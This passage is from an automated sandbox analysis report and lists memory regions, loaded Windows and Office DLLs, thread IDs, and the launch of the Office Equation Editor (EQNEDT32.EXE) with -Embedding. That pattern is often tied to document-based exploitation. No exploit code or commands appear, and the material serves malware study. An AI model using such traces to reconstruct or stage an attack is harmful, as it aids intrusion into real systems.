region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 554 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 555 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 556 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 557 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 558 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 559 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 560 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 561 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 562 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 563 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 564 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 565 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 566 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 567 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 568 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 569 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 570 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 571 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 572 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 573 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 574 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 575 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 576 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 577 start_va = 0x7fee5be0000 end_va = 0x7fee5c06fff entry_point = 0x7fee5be0000 region_type = mapped_file name = "ehstorapi.dll" filename = "\\Windows\\System32\\EhStorAPI.dll" (normalized: "c:\\windows\\system32\\ehstorapi.dll") Region: id = 578 start_va = 0x3f20000 end_va = 0x3f23fff entry_point = 0x3f20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 579 start_va = 0x3f30000 end_va = 0x3faffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f30000" filename = "" Region: id = 580 start_va = 0x53b0000 end_va = 0x542ffff entry_point = 0x53b0000 region_type = mapped_file name = "~dffb575149cfb18c0e.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DFFB575149CFB18C0E.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~dffb575149cfb18c0e.tmp") Region: id = 581 start_va = 0xaec0000 end_va = 0xaf3ffff entry_point = 0x0 region_type = private name = "private_0x000000000aec0000" filename = "" Region: id = 582 start_va = 0xc660000 end_va = 0xc6dffff entry_point = 0x0 region_type = private name = "private_0x000000000c660000" filename = "" Region: id = 583 start_va = 0xd540000 end_va = 0xd63ffff entry_point = 0x0 region_type = private name = "private_0x000000000d540000" filename = "" Region: id = 584 start_va = 0xd800000 end_va = 0xd8fffff entry_point = 0x0 region_type = private name = "private_0x000000000d800000" filename = "" Region: id = 585 start_va = 0xd900000 end_va = 0xe8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d900000" filename = "" Region: id = 586 start_va = 0x7fef6100000 end_va = 0x7fef62f1fff entry_point = 0x7fef6100000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 587 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 588 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1069 start_va = 0x3fb0000 end_va = 0x3fb0fff entry_point = 0x3fb0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1070 start_va = 0x3fc0000 end_va = 0x3fc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 1071 start_va = 0x3fd0000 end_va = 0x3fd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fd0000" filename = "" Region: id = 1072 start_va = 0x3fe0000 end_va = 0x3fe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003fe0000" filename = "" Region: id = 1073 start_va = 0x4000000 end_va = 0x4000fff entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1074 start_va = 0x5430000 end_va = 0x54affff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 1075 start_va = 0x5a30000 end_va = 0x5a30fff entry_point = 0x0 region_type = private name = "private_0x0000000005a30000" filename = "" Region: id = 1076 start_va = 0x5bd0000 end_va = 0x5bd0fff entry_point = 0x0 region_type = private name = "private_0x0000000005bd0000" filename = "" Region: id = 1077 start_va = 0xcea0000 end_va = 0xd043fff entry_point = 0x0 region_type = private name = "private_0x000000000cea0000" filename = "" Region: id = 1078 start_va = 0xd320000 end_va = 0xd39ffff entry_point = 0x0 region_type = private name = "private_0x000000000d320000" filename = "" Region: id = 1079 start_va = 0xec70000 end_va = 0xeceffff entry_point = 0x0 region_type = private name = "private_0x000000000ec70000" filename = "" Region: id = 1080 start_va = 0xecf0000 end_va = 0xf0effff entry_point = 0x0 region_type = private name = "private_0x000000000ecf0000" filename = "" Region: id = 1081 start_va = 0x7fee57e0000 end_va = 0x7fee5899fff entry_point = 0x7fee57e0000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 1082 start_va = 0x4010000 end_va = 0x4010fff entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 1083 start_va = 0x4a60000 end_va = 0x4a61fff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 1084 start_va = 0x4d60000 end_va = 0x4d61fff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 1085 start_va = 0x4d70000 end_va = 0x4d71fff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 1086 start_va = 0x5380000 end_va = 0x5380fff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 1087 start_va = 0x5be0000 end_va = 0x5be0fff entry_point = 0x0 region_type = private name = "private_0x0000000005be0000" filename = "" Region: id = 1088 start_va = 0x7fee5c80000 end_va = 0x7fee5ca2fff entry_point = 0x7fee5c80000 region_type = mapped_file name = "officevoicemanager.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\officevoicemanager.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\officevoicemanager.dll") Region: id = 1092 start_va = 0x3ff0000 end_va = 0x3ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ff0000" filename = "" Region: id = 1093 start_va = 0x4a70000 end_va = 0x4a71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a70000" filename = "" Region: id = 1094 start_va = 0x6a20000 end_va = 0x6a20fff entry_point = 0x0 region_type = private name = "private_0x0000000006a20000" filename = "" Region: id = 1095 start_va = 0x7fd0000 end_va = 0x8218fff entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 1096 start_va = 0x83e0000 end_va = 0x8625fff entry_point = 0x0 region_type = private name = "private_0x00000000083e0000" filename = "" Region: id = 1097 start_va = 0x8630000 end_va = 0x8874fff entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 1098 start_va = 0xf340000 end_va = 0xf584fff entry_point = 0x0 region_type = private name = "private_0x000000000f340000" filename = "" Region: id = 1099 start_va = 0xf780000 end_va = 0xf966fff entry_point = 0x0 region_type = private name = "private_0x000000000f780000" filename = "" Region: id = 1100 start_va = 0x100d0000 end_va = 0x10822fff entry_point = 0x0 region_type = private name = "private_0x00000000100d0000" filename = "" Region: id = 1101 start_va = 0x10830000 end_va = 0x10f80fff entry_point = 0x0 region_type = private name = "private_0x0000000010830000" filename = "" Region: id = 1102 start_va = 0x10f90000 end_va = 0x11850fff entry_point = 0x0 region_type = private name = "private_0x0000000010f90000" filename = "" Region: id = 1103 start_va = 0x11860000 end_va = 0x12120fff entry_point = 0x0 region_type = private name = "private_0x0000000011860000" filename = "" Region: id = 1104 start_va = 0x7fee4b20000 end_va = 0x7fee5670fff entry_point = 0x7fee4b20000 region_type = mapped_file name = "igx.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\IGX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\igx.dll") Region: id = 1984 start_va = 0x2ad0000 end_va = 0x2ad2fff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1985 start_va = 0x6e20000 end_va = 0x6e21fff entry_point = 0x0 region_type = private name = "private_0x0000000006e20000" filename = "" Region: id = 1986 start_va = 0x8630000 end_va = 0x8a30fff entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 1987 start_va = 0xf970000 end_va = 0xfd70fff entry_point = 0x0 region_type = private name = "private_0x000000000f970000" filename = "" Region: id = 1988 start_va = 0x10830000 end_va = 0x1102ffff entry_point = 0x0 region_type = private name = "private_0x0000000010830000" filename = "" Region: id = 1989 start_va = 0x7fefda90000 end_va = 0x7fefdb20fff entry_point = 0x7fefda90000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Thread: id = 1 os_tid = 0xae8 Thread: id = 2 os_tid = 0xae4 Thread: id = 3 os_tid = 0xae0 Thread: id = 4 os_tid = 0xadc Thread: id = 5 os_tid = 0xaac Thread: id = 6 os_tid = 0xaa8 Thread: id = 7 os_tid = 0xa48 Thread: id = 8 os_tid = 0xa40 Thread: id = 9 os_tid = 0xa10 Thread: id = 10 os_tid = 0xa0c Thread: id = 11 os_tid = 0xa04 Thread: id = 12 os_tid = 0xa00 Thread: id = 13 os_tid = 0x9a0 Thread: id = 14 os_tid = 0x990 Thread: id = 15 os_tid = 0x98c Thread: id = 16 os_tid = 0x988 Thread: id = 17 os_tid = 0x978 Thread: id = 18 os_tid = 0x970 Thread: id = 19 os_tid = 0x96c Thread: id = 20 os_tid = 0x968 Thread: id = 21 os_tid = 0x964 Thread: id = 22 os_tid = 0x960 Thread: id = 23 os_tid = 0x940 Thread: id = 24 os_tid = 0x920 Thread: id = 25 os_tid = 0x91c Thread: id = 26 os_tid = 0x918 Thread: id = 27 os_tid = 0x914 Thread: id = 28 os_tid = 0x910 Thread: id = 29 os_tid = 0x90c Thread: id = 30 os_tid = 0x908 Thread: id = 31 os_tid = 0x900 Thread: id = 32 os_tid = 0xaf8 Thread: id = 33 os_tid = 0xafc Thread: id = 34 os_tid = 0xb10 Thread: id = 35 os_tid = 0xb14 Thread: id = 89 os_tid = 0x810 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x66a3000" os_pid = "0xb50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x8fc" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 589 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 590 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 591 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 592 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 593 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 594 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 595 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 596 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 597 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 598 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 599 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 600 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 601 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 602 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 603 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 604 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 605 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 606 start_va = 0x670000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 607 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 608 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 609 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 610 start_va = 0x8d0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 611 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 612 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 613 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 614 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 615 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 616 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 617 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 618 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 619 start_va = 0x754f0000 end_va = 0x75506fff entry_point = 0x754f0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 620 start_va = 0x75510000 end_va = 0x75688fff entry_point = 0x75510000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 621 start_va = 0x75690000 end_va = 0x75847fff entry_point = 0x75690000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 622 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 623 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 624 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 625 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 626 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 627 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 628 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 629 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 630 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 631 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 632 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 633 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 634 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 635 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 636 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 637 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 638 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 639 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 640 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 641 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 642 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 643 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 644 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 645 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 646 start_va = 0x240000 end_va = 0x246fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 647 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 648 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 649 start_va = 0x9d0000 end_va = 0x1dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 650 start_va = 0x1dd0000 end_va = 0x209efff entry_point = 0x1dd0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 651 start_va = 0x20a0000 end_va = 0x2492fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 652 start_va = 0x6fe20000 end_va = 0x6fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000006fe20000" filename = "" Region: id = 653 start_va = 0x75290000 end_va = 0x75292fff entry_point = 0x75290000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 654 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 655 start_va = 0x2660000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 656 start_va = 0x2670000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 657 start_va = 0x74b10000 end_va = 0x74d4ffff entry_point = 0x74b10000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 658 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 659 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 660 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 661 start_va = 0x24a0000 end_va = 0x257efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024a0000" filename = "" Region: id = 662 start_va = 0x25f0000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 663 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 664 start_va = 0x270000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 665 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 666 start_va = 0x2a70000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 667 start_va = 0x2b70000 end_va = 0x2c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 668 start_va = 0x75440000 end_va = 0x75455fff entry_point = 0x75440000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 669 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 670 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 671 start_va = 0x753f0000 end_va = 0x7542afff entry_point = 0x753f0000 region_type = 